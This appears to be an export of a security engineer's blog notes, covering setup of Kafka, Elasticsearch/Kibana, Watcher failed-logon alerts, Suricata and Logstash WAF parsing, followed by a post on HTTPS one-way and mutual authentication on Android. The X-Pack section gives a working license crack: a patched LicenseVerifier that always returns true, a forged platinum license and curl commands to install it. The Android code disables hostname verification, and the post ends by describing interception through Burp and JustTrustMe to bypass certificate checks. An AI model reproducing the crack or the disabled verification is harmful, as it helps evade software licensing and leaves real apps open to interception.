<p><code>bin/kafka-server-start.sh -daemon config/server.properties</code></p>
<p>Auto-create a topic<br><code>bin/kafka-console-producer.sh --broker-list localhost:9092 --topic test</code></p>
<p>List the created topics<br><code>bin/kafka-topics.sh --list --zookeeper localhost:2181</code></p>
<p>Show details of the test topic<br><code>bin/kafka-topics.sh --describe --zookeeper localhost:2181 --topic test</code></p>
<p>Delete a topic<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div></pre></td><td class="code"><pre><div class="line">bin/kafka-topics.sh --delete --zookeeper localhost:2181 --topic test # mark for deletion</div><div class="line">bin/zookeeper-shell.sh localhost:2181 # delete in zk</div><div class="line">ls /brokers/topics</div><div class="line">rmr /brokers/topics/test</div></pre></td></tr></table></figure></p>
<blockquote>
<p>Or set delete.topic.enable=true in server.properties</p>
</blockquote>
<p>Test</p>
<p>Producer<br><code>bin/kafka-console-producer.sh --broker-list localhost:9092 --topic test</code></p>
<p>Consumer<br><code>bin/kafka-console-consumer.sh --zookeeper localhost:2181 --topic test --from-beginning</code></p>
<blockquote>
<p>The producer and consumer machines must have the kafka host names in their hosts file</p>
</blockquote>
<h4 id="集群"><a href="#集群" class="headerlink" title="集群"></a>Cluster</h4><p>zookeeper.properties</p>
<pre><code>initLimit=10
syncLimit=5
dataDir=/tmp/zookeeper
clientPort=2181
maxClientCnxns=0
server.0=kafka:2888:3888
server.1=kafka01:2889:3889
server.2=kafka02:2890:3890
</code></pre>
<p>Write each server's own id into the dataDir directory<br><code>mkdir -p /tmp/zookeeper/log && echo [server.id] > /tmp/zookeeper/myid</code></p>
<p>server.properties</p>
<pre><code>broker.id=0 # use a different id on each broker
listeners=PLAINTEXT://kafka:9092
advertised.listeners=PLAINTEXT://kafka:9092
zookeeper.connect=kafka:2181,kafka01:2181,kafka02:2181
</code></pre>
<p>Test</p>
<p>Create a topic, write messages to any broker, and read them back from any broker.</p>
<p>Create a topic<br><code>bin/kafka-topics.sh --create --zookeeper devkafka01:2181,devkafka02:2181,devkafka03:2181 --replication-factor 3 --partitions 3 --topic mytopic</code></p>
<p>List topics<br><code>bin/kafka-topics.sh --list --zookeeper localhost:2181</code></p>
<p>Describe the topic<br><code>bin/kafka-topics.sh --describe --zookeeper devkafka01:2181 --topic mytopic</code></p>
<p>Start a producer<br><code>bin/kafka-console-producer.sh --broker-list devkafka01:9092,devkafka02:9092,devkafka03:9092 --topic mytopic</code></p>
<p>Start a consumer<br><code>bin/kafka-console-consumer.sh --zookeeper devkafka01:2181,devkafka02:2181,devkafka03:2181 --from-beginning --topic mytopic</code></p>
<h4 id="监控"><a href="#监控" class="headerlink" title="监控"></a>Monitoring</h4><p>kom.sh</p>
<pre><code>#!/bin/bash
java -cp KafkaOffsetMonitor-assembly-0.3.0-SNAPSHOT.jar \
com.quantifind.kafka.offsetapp.OffsetGetterWeb \
--offsetStorage kafka \
--zk devkafka01,devkafka02,devkafka03 \
--port 8080 \
--refresh 10.seconds \
--retain 1.days
</code></pre>
<p><code>nohup ./kom.sh > /dev/null 2>&1 &</code></p>
<h4 id="压力测试"><a href="#压力测试" class="headerlink" title="压力测试"></a>Load testing</h4><h3 id="Kibana"><a href="#Kibana" class="headerlink" title="Kibana"></a>Kibana</h3><p><code>/etc/kibana/kibana.yml</code></p>
<pre><code>server.port: 5601 # port Kibana listens on
server.host: 0.0.0.0 # listen address
elasticsearch.url: "http://127.0.0.1:9200" # Elasticsearch master node
elasticsearch.username: "elastic"
elasticsearch.password: "changeme"
</code></pre>
<p>Install X-Pack offline</p>
<p><code>bin/kibana-plugin install file:///tmp/x-pack-5.6.10.zip</code></p>
<p><code>service kibana start</code><br>or<br><code>nohup bin/kibana &</code></p>
<h3 id="图表"><a href="#图表" class="headerlink" title="图表"></a>Charts</h3><p>Pie chart of alert types<br>Bar chart of attack source addresses<br>Requested URL information</p>
<h3 id="Grafana"><a href="#Grafana" class="headerlink" title="Grafana"></a>Grafana</h3><h3 id="Beats"><a href="#Beats" class="headerlink" title="Beats"></a>Beats</h3><p>Winlogbeat 5.6.10</p>
<p>Configuration<br>winlogbeat.yml</p>
<pre><code>#----------------------------- Logstash output --------------------------------
output.logstash:
  # The Logstash hosts
  hosts: ["192.168.200.109:5044"]

#--------------------------kafka-----------------------------------
output.kafka:
  # initial brokers for reading cluster metadata
  hosts: ["192.168.6.22:9092"]
  topic: "test"
</code></pre>
<p>Logstash</p>
<pre><code>input {
  beats {
    port => 5044
  }
}
</code></pre>
<p>Check the configuration<br><code>.\winlogbeat.exe -c .\winlogbeat.yml -configtest -e</code></p>
<p>Install<br><code>PS C:\winlogbeat-5.6.10-windows-x86_64> .\install-service-winlogbeat.ps1</code><br>Start the service<br><code>net start winlogbeat</code></p>
<h3 id="Flume"><a href="#Flume" class="headerlink" title="Flume"></a>Flume</h3><h3 id="X-Pack"><a href="#X-Pack" class="headerlink" title="X-Pack"></a>X-Pack</h3><p>Default credentials<br>username: elastic<br>password: changeme</p>
<p>Cracking</p>
<p>LicenseVerifier.java</p>
<pre><code>package org.elasticsearch.license;

import java.nio.*;
import java.util.*;
import java.security.*;
import org.elasticsearch.common.xcontent.*;
import org.apache.lucene.util.*;
import org.elasticsearch.common.io.*;
import java.io.*;

public class LicenseVerifier
{
    public static boolean verifyLicense(final License license, final byte[] encryptedPublicKeyData) {
        return true;
    }

    public static boolean verifyLicense(final License license) {
        return true;
    }
}
</code></pre>
<p><code>javac -cp "/usr/share/elasticsearch/lib/elasticsearch-5.6.10.jar:/usr/share/elasticsearch/lib/lucene-core-6.6.1.jar:/usr/share/elasticsearch/plugins/x-pack/x-pack-5.6.10.jar" LicenseVerifier.java</code></p>
<p>Register the new license</p>
<pre><code>{"license":{"uid":"d3cbbbee-9155-4e1a-a5ed-a7e8940d6564","type":"platinum","issue_date_in_millis":1499299200000,"expiry_date_in_millis":2524579200999,"max_nodes":1000,"issued_to":"guo dalu (eastmoney)","issuer":"Web Form","signature":"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","start_date_in_millis":1499299200000}}
</code></pre>
<p><code>curl -XPUT -u elastic:changeme 'http://30.3.229.120:9200/_xpack/license?acknowledge=true' -d @l.json</code><br><code>curl -XGET -u elastic:changeme 'http://30.3.229.120:9200/_license'</code></p>
<h4 id="Watcher"><a href="#Watcher" class="headerlink" title="Watcher"></a>Watcher</h4><p>Watch for log entries that contain alerts and send an e-mail notification.</p>
<p>Configure elasticsearch.yml</p>
<pre><code>xpack.notification.email.account:
  exchange_account:
    profile: outlook
    email_defaults:
      from: user@domain.com
    smtp:
      auth: true
      starttls.enable: false
      host: mail.domain.com
      port: 587
      user: user
      password: pass
</code></pre>
<p>Watch definition matching <code>"event_type": "alert"</code>:</p>
<pre><code>{
  "trigger": {
    // fire every 5m
    "schedule": {
      "interval": "5m"
    }
  },
  "input": {
    // search query
    "search": {
      "request": {
        "search_type": "query_then_fetch",
        "indices": ["logstash-map-2018.07"],
        "types": [],
        "body": {
          "size": 0,
          "query": {
            // bool: both clauses must match
            "bool" : {
              "must" : [
                { "match" : { "event_type": "alert" }},
                { "range" : { "@timestamp" : { "gte" : "now-1h" }}}
              ]
            }
          }
        }
      }
    }
  },
  // condition that decides whether the actions run
  "condition": {
    "compare": {
      "ctx.payload.hits.total": {
        "gte": 10
      }
    }
  },
  // how the alert is delivered
  "actions": {
    "my-logging-action": {
      "logging": {
        "level": "info",
        "text": "Found {{ctx.payload.hits.total}} alerts in last 5m."
      }
    }
  }
}
</code></pre>
<p>Aggregate users with failed logons within 5 minutes</p>
<pre><code>GET logstash-dc01-security-2018.08/_search
{
  "size": 1,
  "query": {
    "bool" : {
      "must" : [{ "match" : { "event_id" : 4625 }}],
      "filter":[{ "range" : { "@timestamp" : { "gte" : "now-1d" }}}]
    }
  },
  "aggs": {
    "group_by_TargetUserName": {
      "terms": {
        "field": "event_data.TargetUserName.keyword"
      }
    }
  }
}

Result:

"aggregations": {
  "group_by_TargetUserName": {
    "doc_count_error_upper_bound": 0,
    "sum_other_doc_count": 0,
    "buckets": [
      {
        "doc_count": 6,
        "key": "test"
      },
      {
        "doc_count": 2,
        "key": "test1"
      },
      {
        "doc_count": 1,
        "key": "admin"
      }
    ]
  }
}
</code></pre>
<p>Array<br><code>ctx.payload.aggregations.group_by_TargetUserName.buckets</code></p>
<pre><code>"condition": {
  "array_compare": {
    "ctx.payload.aggregations.group_by_TargetUserName.buckets" : {
      "path": "doc_count" ,
      "gte": {
        "value": 25,
        "quantifier": "some"
      }
    }
  }
}
</code></pre>
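<p>The aggregation query above and the <code>array_compare</code> condition below it are the two halves of one detection: count 4625 (failed logon) events per target user, then fire when some bucket crosses a threshold. The following Python is an added example, not code from the original post or from Elastic; it re-implements that logic locally over a handful of constructed Winlogbeat-style events (the event list, the fixed <code>NOW</code>, and the field names reduced to what the watch reads are all assumptions made for the example), so the threshold semantics can be checked without a cluster. The <code>quantifier</code> values <code>some</code>/<code>all</code> follow the page's condition; treating an empty bucket list as "do not fire" is this example's own choice.</p>

```python
import operator
from collections import Counter
from datetime import datetime, timedelta, timezone

# Fixed "now" keeps the example deterministic. The events are constructed, not real
# log data, in the shape Winlogbeat ships to Elasticsearch, reduced to the fields
# the watch reads (@timestamp, event_id, event_data.TargetUserName).
NOW = datetime(2018, 8, 20, 9, 0, tzinfo=timezone.utc)

SAMPLE_EVENTS = [
    {"@timestamp": NOW - timedelta(minutes=m), "event_id": 4625,
     "event_data": {"TargetUserName": user}}
    for m, user in [(1, "test"), (2, "test"), (3, "test"),
                    (2, "test1"), (4, "test1"),
                    (30, "admin"),      # outside a 5-minute window
                    (120, "test")]      # outside a 5-minute window
] + [
    # a successful logon (4624) must never be counted as a failure
    {"@timestamp": NOW - timedelta(minutes=1), "event_id": 4624,
     "event_data": {"TargetUserName": "admin"}},
]

_OPS = {"gte": operator.ge, "gt": operator.gt, "lte": operator.le,
        "lt": operator.lt, "eq": operator.eq, "not_eq": operator.ne}


def terms_aggregation(events, now, window, field="TargetUserName"):
    """Local equivalent of the page's query: keep event_id 4625 within `window`
    of `now`, then a terms aggregation on event_data[field]. Returns
    Elasticsearch-style buckets ordered by doc_count descending, then by key."""
    start = now - window
    counts = Counter(
        e["event_data"][field]
        for e in events
        if e["event_id"] == 4625 and e["@timestamp"] >= start
    )
    return [{"key": k, "doc_count": c}
            for k, c in sorted(counts.items(), key=lambda kv: (-kv[1], kv[0]))]


def array_compare(buckets, path, op, value, quantifier="some"):
    """Watcher-style array_compare: apply `op` (gte, gt, lte, lt, eq, not_eq)
    between bucket[path] and `value`. 'some' fires if any bucket passes, 'all'
    only if every bucket does. An empty bucket list never fires (example's own
    choice), so a quiet window stays silent instead of alerting vacuously."""
    if not buckets:
        return False
    results = [_OPS[op](b[path], value) for b in buckets]
    return any(results) if quantifier == "some" else all(results)


def failed_logon_watch(events, now=NOW, window_minutes=5, threshold=3):
    """Run the aggregation and the condition; returns (buckets, fired)."""
    buckets = terms_aggregation(events, now, timedelta(minutes=window_minutes))
    return buckets, array_compare(buckets, "doc_count", "gte", threshold, "some")


if __name__ == "__main__":
    buckets, fired = failed_logon_watch(SAMPLE_EVENTS)
    for b in buckets:
        print(f"{b['key']:10} {b['doc_count']}")
    print("fired:", fired)
```

<p>The threshold here is 3 rather than the page's 25 only so the constructed sample trips it; the comparison operator and quantifier are the same. Raising the window to a day pulls the older events back into the buckets, which is the knob to tune when a watch is too noisy or too quiet.</p>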
<p>Actions</p>
<p>Send e-mail</p>
<pre><code>"send_email" : {
  "throttle_period": "15m",
  "email" : {
    "to" : "&lt;username&gt;@&lt;domainname&gt;",
    "cc": ["a@&lt;domainname&gt;","b@&lt;domainname&gt;"],
    "subject" : "Watcher Notification",
    "body" : "Top10 users:\n{{#ctx.payload.aggregations.topn.buckets}}\n{{key}} {{doc_count}}\n{{/ctx.payload.aggregations.topn.buckets}}",
    "attachments" : {
      "attached_data" : {
        "data" : {
          "format" : "json"
        }
      }
    },
    "priority" : "high"
  }
}
</code></pre>
<p>webhook</p>
<h3 id="Suricata"><a href="#Suricata" class="headerlink" title="Suricata"></a>Suricata</h3><p><a href="https://suricata-ids.org/" target="_blank" rel="external">https://suricata-ids.org/</a></p>
<p>Installation</p>
<pre><code>sudo yum -y install gcc libpcap-devel pcre-devel libyaml-devel file-devel \
  zlib-devel jansson-devel nss-devel libcap-ng-devel libnet-devel tar make \
  libnetfilter_queue-devel lua-devel
wget https://www.openinfosecfoundation.org/download/suricata-4.0.4.tar.gz
tar -zxvf suricata-4.0.4.tar.gz
cd suricata-4.0.4
./configure --prefix=/usr --sysconfdir=/etc --localstatedir=/var --enable-nfqueue --enable-lua
make && make install
make install-full
</code></pre>
<p><code>suricata -c /etc/suricata/suricata.yaml -i eth1</code></p>
<h4 id="更新规则"><a href="#更新规则" class="headerlink" title="更新规则"></a>Updating rules</h4><p><code>pip install suricata-update</code></p>
<p>Rule sources<br><a href="https://www.openinfosecfoundation.org/rules/index.yaml" target="_blank" rel="external">https://www.openinfosecfoundation.org/rules/index.yaml</a></p>
<p>et/open: <a href="https://rules.emergingthreats.net/open/suricata-%(__version__)s/emerging.rules.tar.gz" target="_blank" rel="external">https://rules.emergingthreats.net/open/suricata-%(__version__)s/emerging.rules.tar.gz</a><br>et/pro: <a href="https://rules.emergingthreatspro.com/%(secret-code)s/suricata-%(__version__)s/etpro.rules.tar.gz" target="_blank" rel="external">https://rules.emergingthreatspro.com/%(secret-code)s/suricata-%(__version__)s/etpro.rules.tar.gz</a><br>oisf/trafficid: <a href="https://raw.githubusercontent.com/jasonish/suricata-trafficid/master/rules/traffic-id.rules" target="_blank" rel="external">https://raw.githubusercontent.com/jasonish/suricata-trafficid/master/rules/traffic-id.rules</a><br>ptresearch/attackdetection: <a href="https://raw.githubusercontent.com/ptresearch/AttackDetection/master/pt.rules.tar.gz" target="_blank" rel="external">https://raw.githubusercontent.com/ptresearch/AttackDetection/master/pt.rules.tar.gz</a><br>scwx/malware: <a href="https://ws.secureworks.com/ti/ruleset/%(secret-code)s/Suricata_suricata-malware_latest.tgz" target="_blank" rel="external">https://ws.secureworks.com/ti/ruleset/%(secret-code)s/Suricata_suricata-malware_latest.tgz</a><br>scwx/security: <a href="https://ws.secureworks.com/ti/ruleset/59af35658a44c415/Suricata_suricata-security_latest.tgz" target="_blank" rel="external">https://ws.secureworks.com/ti/ruleset/59af35658a44c415/Suricata_suricata-security_latest.tgz</a><br>sslbl/ssl-fp-blacklist: <a href="https://sslbl.abuse.ch/blacklist/sslblacklist.rules" target="_blank" rel="external">https://sslbl.abuse.ch/blacklist/sslblacklist.rules</a></p>
<h2 id="日志采集"><a href="#日志采集" class="headerlink" title="日志采集"></a>Log collection</h2><h3 id="Syslog"><a href="#Syslog" class="headerlink" title="Syslog"></a>Syslog</h3><p>Syslog log format</p>
<p>WAF</p>
<pre><code>input {
  syslog {
    timezone => "Asia/Shanghai"
    id => "my_plugin_id"
    port => 514
  }
}

filter {
  # drop waf_log_wafstat
  if [severity] == 6 {
    drop { }
  }
  # waf log
  if [severity] == 3 {
    grok {
      match => { "message" => "tag:%{DATA:tag}\s*site_id:%{INT:site_id}\s*protect_id:%{INT:protect_id}\s*dst_ip:%{IPORHOST:dst_ip}\s*dst_port:%{INT:dst_port}\s*src_ip:%{IPORHOST:src_ip}\s*src_port:%{INT:src_port}\s*method:%{DATA:method}\s*domain:%{DATA:domain}\s*uri:%{DATA:uri}\s*alertlevel:%{DATA:alert_level}\s*event_type:%{DATA:event_type}\s*stat_time:%{TIMESTAMP_ISO8601:stat_time}\s*policy_id:%{INT:policy_id}\s*rule_id:%{INT:rule_id}\s*action:%{DATA:action}\s*block:%{DATA:block}\s*block_info:%{DATA:block_info}\s*http:%{DATA:http}\s*alertinfo:%{DATA:alertinfo}\s*proxy_info:%{DATA:proxy_info}\s*characters:%{DATA:characters}\s*count_num:%{INT:count_num}\s*protocol_type:%{DATA:protocol_type}\s*wci:%{DATA:wci}\s*wsi:%{DATA:wsi}\s*country:%{DATA:country}"}
    }
    mutate {
      remove_field => ["message"]
    }
  }
}

output {
  elasticsearch {
    hosts => ["http://develk01:9200","http://develk02:9200","http://develk03:9200"]
    user => "elastic"
    password => "changeme"
    index => "waf-cs-syslog-217"
  }
  stdout { codec => rubydebug }
}
</code></pre>
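<p>The grok pattern in the filter above is a long run of <code>key:value</code> fields joined by <code>\s*</code>. The Python below is an added example, not part of the original post or of Logstash; it builds the equivalent regular expression from the same field list, applies the same severity logic (drop 6, parse 3, remove the raw message on success) and runs it over a constructed WAF syslog line. The field order, the simplified regexes standing in for grok's <code>DATA</code>, <code>INT</code>, <code>IPORHOST</code> and <code>TIMESTAMP_ISO8601</code>, and the sample records are all assumptions of the example. One caveat it makes explicit: grok's <code>DATA</code> is a non-greedy <code>.*?</code>, so a trailing <code>%{DATA:country}</code> in an unanchored pattern can legally capture an empty string; the example anchors the end with <code>\s*$</code> to avoid that.</p>

```python
import re

# Field list mirrored from the page's grok pattern:
# (key in the log line, field name in the parsed event, grok pattern type).
# Order matters, exactly as it does in grok.
WAF_FIELDS = [
    ("tag", "tag", "DATA"), ("site_id", "site_id", "INT"),
    ("protect_id", "protect_id", "INT"), ("dst_ip", "dst_ip", "IPORHOST"),
    ("dst_port", "dst_port", "INT"), ("src_ip", "src_ip", "IPORHOST"),
    ("src_port", "src_port", "INT"), ("method", "method", "DATA"),
    ("domain", "domain", "DATA"), ("uri", "uri", "DATA"),
    ("alertlevel", "alert_level", "DATA"), ("event_type", "event_type", "DATA"),
    ("stat_time", "stat_time", "TIMESTAMP_ISO8601"), ("policy_id", "policy_id", "INT"),
    ("rule_id", "rule_id", "INT"), ("action", "action", "DATA"),
    ("block", "block", "DATA"), ("block_info", "block_info", "DATA"),
    ("http", "http", "DATA"), ("alertinfo", "alertinfo", "DATA"),
    ("proxy_info", "proxy_info", "DATA"), ("characters", "characters", "DATA"),
    ("count_num", "count_num", "INT"), ("protocol_type", "protocol_type", "DATA"),
    ("wci", "wci", "DATA"), ("wsi", "wsi", "DATA"), ("country", "country", "DATA"),
]

# Simplified regex equivalents of the grok types used above (assumption of this
# example; the real grok-patterns definitions are more elaborate).
GROK_TYPES = {
    "DATA": r".*?",
    "INT": r"[+-]?\d+",
    "IPORHOST": r"[\w.:-]+",
    "TIMESTAMP_ISO8601": r"\d{4}-\d{2}-\d{2}[T ]\d{2}:\d{2}(?::\d{2})?(?:\.\d+)?(?:Z|[+-]\d{2}:?\d{2})?",
}

# \s*$ at the end makes the final non-greedy DATA capture run to end of line.
WAF_RE = re.compile(
    r"\s*".join(f"{key}:({GROK_TYPES[typ]})" for key, _, typ in WAF_FIELDS) + r"\s*$"
)
FIELD_NAMES = [name for _, name, _ in WAF_FIELDS]
INT_FIELDS = {name for _, name, typ in WAF_FIELDS if typ == "INT"}


def parse_waf_message(message):
    """Return the parsed fields as a dict, or None when the line does not match."""
    m = WAF_RE.search(message)
    if m is None:
        return None
    fields = dict(zip(FIELD_NAMES, m.groups()))
    for name in INT_FIELDS:
        fields[name] = int(fields[name])
    return fields


def filter_records(records):
    """Same decisions as the page's filter block: drop severity 6 (WAF statistics),
    parse severity 3 (WAF alerts) and replace the raw message with the extracted
    fields. Unlike the page's config, a line that fails to parse keeps its message
    and is tagged _grokparsefailure (the tag Logstash's grok filter itself adds)
    rather than having the only copy of the event removed."""
    out = []
    for rec in records:
        severity = rec.get("severity")
        if severity == 6:
            continue
        if severity == 3:
            parsed = parse_waf_message(rec.get("message", ""))
            if parsed is None:
                rec = dict(rec, tags=rec.get("tags", []) + ["_grokparsefailure"])
            else:
                rec = {k: v for k, v in rec.items() if k != "message"}
                rec.update(parsed)
        out.append(rec)
    return out


# Constructed sample syslog records (not real WAF output); the message follows the
# key:value order of the page's grok pattern.
SAMPLE_WAF_RECORDS = [
    {"severity": 6, "message": "tag:waf_log_wafstat site_id:1 total:42"},
    {"severity": 3, "message": (
        "tag:waf_log_websec site_id:1 protect_id:2 dst_ip:10.0.0.5 dst_port:80 "
        "src_ip:192.0.2.10 src_port:51234 method:GET domain:www.example.com "
        "uri:/index.php?id=1 alertlevel:HIGH event_type:sql_injection "
        "stat_time:2018-08-20T09:00:00+08:00 policy_id:3 rule_id:100 action:deny "
        "block:yes block_info:none http:HTTP/1.1 alertinfo:pattern_match proxy_info:- "
        "characters:- count_num:1 protocol_type:http wci:- wsi:- country:CN")},
    {"severity": 3, "message": "not a waf alert line"},
]

if __name__ == "__main__":
    for rec in filter_records(SAMPLE_WAF_RECORDS):
        print(rec)
```

<p>Keeping failed lines with a <code>_grokparsefailure</code> tag, instead of unconditionally running <code>mutate { remove_field => ["message"] }</code>, is what lets you notice when the WAF vendor changes its log layout: the untouched message still reaches the index and can be searched for.</p>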
<h4 id="sysmon"><a href="#sysmon" class="headerlink" title="sysmon"></a>sysmon</h4><pre><code>input {
  beats {
    port => 5044
  }
}
filter{
  mutate {
    split => ["message","\r"]
    remove_field => ["message","beat","@version"]
    lowercase => ["host"] # index must be lower case
  }
}

"source_name" => "Microsoft-Windows-Security-Auditing"
"Microsoft-Windows-Sysmon"

output {

  elasticsearch {
    hosts => ["http://develk01:9200"]
    index => "logstash-%{[host]}-%{+YYYY.MM.dd}"
  }
}
</code></pre>]]></content>
</entry>
<entry>
<title><![CDATA[HTTPS单向双向认证]]></title>
<url>/2018/11/02/HTTPS%E5%8D%95%E5%90%91%E5%8F%8C%E5%90%91%E8%AE%A4%E8%AF%81/</url>
<content type="html"><![CDATA[<ul>
<li>JKS: a digital certificate store. A JKS holds KeyEntry and CertEntry items, and every entry in the store is identified by an alias.</li>
<li>P12: short for PKCS12. Likewise a certificate store holding a private key, exported from a .jks file; the user installs it on a PC and it identifies the user.</li>
<li>CER: commonly called a digital certificate; it stores a public-key certificate, and anyone may obtain this file.</li>
<li>BKS: the certificate store format specific to the Android platform.</li>
</ul>
<p>Converting crt to bks</p>
<p>Download Bouncy Castle and place the jar in Java\jdk1.8.0_20\jre\lib\ext, or point to it with -providerpath.<br><a href="http://www.bouncycastle.org/latest_releases.html" target="_blank" rel="external">http://www.bouncycastle.org/latest_releases.html</a></p>
<p><code>keytool -importcert -v -trustcacerts -alias mykey -file githubcom.crt -keystore keystore.bks -storetype BKS -providerclass org.bouncycastle.jce.provider.BouncyCastleProvider -providerpath bcprov-jdk15on-1.47.jar -storepass testing</code></p>
<h1 id="单向认证"><a href="#单向认证" class="headerlink" title="单向认证"></a>One-way authentication</h1><h3 id="SSL-Pinning"><a href="#SSL-Pinning" class="headerlink" title="SSL Pinning"></a>SSL Pinning</h3><p>The client ships with the server's public-key certificate, or its fingerprint, preinstalled, and compares it against the server certificate received during the HTTPS request.</p>
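<p>The comparison the paragraph describes, as an added Python example that is not part of the original post: compute the fingerprint of the certificate the server presented and check it against a pinned set in constant time. The certificate bytes are constructed stand-ins (a real client takes them from the TLS handshake, for instance <code>SSLSession.getPeerCertificates()</code> on Android), and the pin format, the backup pin and the fail-closed handling of empty inputs are this example's own choices.</p>

```python
import base64
import hashlib
import hmac


def pin_of(der_bytes):
    """Fingerprint in the "sha256/BASE64" form used by OkHttp and HPKP pin lists.
    Production pinners usually hash the certificate's SubjectPublicKeyInfo so a
    renewal that keeps the key pair keeps working; this helper hashes whatever
    bytes it is given, so pass the SPKI when the key is what you want to pin."""
    digest = hashlib.sha256(der_bytes).digest()
    return "sha256/" + base64.b64encode(digest).decode("ascii")


def matches_pin_set(der_bytes, pins):
    """Constant-time comparison of the candidate pin against every configured pin.
    No early exit, so timing does not reveal which pin (if any) matched."""
    candidate = pin_of(der_bytes)
    matched = False
    for pin in pins:
        matched |= hmac.compare_digest(candidate, pin)
    return matched


def verify_pinned_chain(chain_der, pins):
    """True only if some certificate in the presented chain matches a pin.
    An empty chain or an empty pin set is rejected: pinning must fail closed,
    a misconfigured client must not silently fall back to trusting anything."""
    if not chain_der or not pins:
        return False
    return any(matches_pin_set(cert, pins) for cert in chain_der)


# Constructed stand-ins for DER-encoded certificates (not real certificates).
SERVER_CERT_DER = b"constructed stand-in for the current server certificate"
BACKUP_CERT_DER = b"constructed stand-in for the backup certificate held for rotation"
INTERCEPTOR_CERT_DER = b"constructed stand-in for a certificate issued by an interposed CA"

# Pins are computed once, offline, from the legitimate certificates and shipped in
# the app. Always ship at least one backup pin so a key rotation does not brick it.
PINNED = {pin_of(SERVER_CERT_DER), pin_of(BACKUP_CERT_DER)}

if __name__ == "__main__":
    print("legitimate chain accepted:", verify_pinned_chain([SERVER_CERT_DER], PINNED))
    print("interposed chain accepted:", verify_pinned_chain([INTERCEPTOR_CERT_DER], PINNED))
```

<p>Pinning is layered on top of, not instead of, normal chain validation: the pin check only runs after the platform has already verified the certificate chain and host name, which is also why the Burp and JustTrustMe sections later on this page work by disabling that validation rather than by forging a pin.</p>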
<h1 id="双向验证"><a href="#双向验证" class="headerlink" title="双向验证"></a>Mutual authentication</h1><p>What is mutual authentication? An example.</p>
<blockquote>
<p>Bandit: Mushroom, which road are you on? What price? (Who are you? Where are you going?)<br>Yang Zirong: Ha! Whatever you wish for shows up: wish for milk and mother comes, wish for kin and the child's uncle arrives. (Looking for fellow bandits)<br>Yang Zirong: Greetings, Third Master!<br>Bandit: The Heavenly King subdues the earth tiger! (You have some nerve, daring to provoke your elders!)<br>Yang Zirong: The Pagoda suppresses the river demon! (If it were so, may I fall to my death off the mountain and drown in the river.)</p>
</blockquote>
<p>Put simply: when two strangers transact, after A gives the passphrase, B can answer with a passphrase that only A and B know.</p>
<h3 id="生成证书"><a href="#生成证书" class="headerlink" title="生成证书"></a>Generating certificates</h3><p>1) Generate the client keystore</p>
<p><code>keytool -genkeypair -alias client -keyalg RSA -validity 3650 -keypass 123456 -storepass 123456 -keystore client.jks</code></p>
<p>2) Generate the server keystore</p>
<p><code>keytool -genkeypair -alias server -keyalg RSA -validity 3650 -keypass 123456 -storepass 123456 -keystore server.keystore</code></p>
<p>Note: the CN must match the IP address; otherwise the hosts file has to be edited.</p>
<p>3) Export the client certificate</p>
<p><code>keytool -export -alias client -file client.cer -keystore client.jks -storepass 123456</code></p>
<p>4) Export the server certificate</p>
<p><code>keytool -export -alias server -file server.cer -keystore server.keystore -storepass 123456</code></p>
<p>5) Exchange certificates</p>
<p>Import the client certificate into the server keystore, then import the server certificate into the client keystore. One keystore can hold several imported certificates, forming a certificate list.</p>
<p>Create the client truststore (a store built from the server certificate):<br><code>keytool -import -v -alias server -file server.cer -keystore truststore.jks -storepass 123456</code></p>
<p>Import the client certificate into the server store (so the server trusts the client certificate):<br><code>keytool -import -v -alias client -file client.cer -keystore server.keystore -storepass 123456</code></p>
<p>6) Generate a BKS store that Android recognizes</p>
<p>Use Portecle to convert client.jks and truststore.jks to BKS format and place them in the Android client's assets directory.</p>
<h3 id="配置tomcat"><a href="#配置tomcat" class="headerlink" title="配置tomcat"></a>Configuring Tomcat</h3><p>Edit server.xml and configure port 8443</p>
<pre><code>&lt;Connector port="8443" protocol="org.apache.coyote.http11.Http11Protocol"
    maxThreads="150" SSLEnabled="true" scheme="https" secure="true"
    clientAuth="true" sslProtocol="TLS"
    keystoreFile="${catalina.base}\conf\server.keystore" keystorePass="123456"
    truststoreFile="${catalina.base}\conf\server.keystore" truststorePass="123456" /&gt;
</code></pre>
<p>Because the browser has no client certificate, access from the browser is refused.</p>
<p><img src="https://i.imgur.com/X0cRtx6.png" alt=""></p>
<h3 id="安卓客户端"><a href="#安卓客户端" class="headerlink" title="安卓客户端"></a>Android client</h3><!-- code -->
<pre><code>try {
    // the client certificate the server verifies, i.e. the client keystore
    KeyStore keyStore = KeyStore.getInstance("BKS");
    // the server certificate the client trusts
    KeyStore trustStore = KeyStore.getInstance("BKS");

    // read the stores from assets
    InputStream ksIn = getResources().getAssets().open("client.bks");
    InputStream tsIn = getResources().getAssets().open("truststore.bks");

    // load the stores
    keyStore.load(ksIn, "123456".toCharArray());
    trustStore.load(tsIn, "123456".toCharArray());
    IOUtils.close(ksIn);
    IOUtils.close(tsIn);

    // initialise the SSLContext
    SSLContext sslContext = SSLContext.getInstance("TLS");
    TrustManagerFactory trustManagerFactory = TrustManagerFactory.getInstance("X509");
    KeyManagerFactory keyManagerFactory = KeyManagerFactory.getInstance("X509");
    trustManagerFactory.init(trustStore);
    keyManagerFactory.init(keyStore, "123456".toCharArray());
    sslContext.init(keyManagerFactory.getKeyManagers(), trustManagerFactory.getTrustManagers(), null);

    // set up the connection through HttpsURLConnection
    SSLSocketFactory socketFactory = sslContext.getSocketFactory();
    HttpsURLConnection.setDefaultSSLSocketFactory(socketFactory);

    // `url` is the server address string supplied by the caller
    URL serverUrl = new URL(url);
    HttpsURLConnection conn = (HttpsURLConnection) serverUrl.openConnection();
    // IP-based host name verification: can be skipped if the certificate is already installed, otherwise it is needed
    conn.setHostnameVerifier(new HostnameVerifier() {
        @Override
        public boolean verify(String hostname, SSLSession session) {
            return true;
        }
    });
    InputStream inputStream = conn.getInputStream();
    String content = getString(inputStream);
    IOUtils.close(inputStream);
    System.out.println(content);

} catch (Exception e) {
    e.printStackTrace();
}
</code></pre>
<h2 id="Burp-代理"><a href="#Burp-代理" class="headerlink" title="Burp 代理"></a>Burp proxy</h2><p>Extract the client certificate from the app and import it in Burp under Project options -> SSL, in the Client SSL Certificates section; Burp can then reach the target site directly. Burp expects a PKCS#12 file, so a BKS keystore (password 123456 in the code above) has to be converted first, e.g. with keytool and the BouncyCastle provider.</p>
<p><img src="https://i.imgur.com/CHvcAzX.png" alt=""></p>
<p>On the app side, the Xposed module JustTrustMe is still used to bypass server certificate validation so that the app accepts Burp's certificate.</p>
]]></content>
</entry>
<entry>
<title><![CDATA[Password Crack Tips]]></title>
<url>/2018/05/11/Password-Crack-Tips/</url>
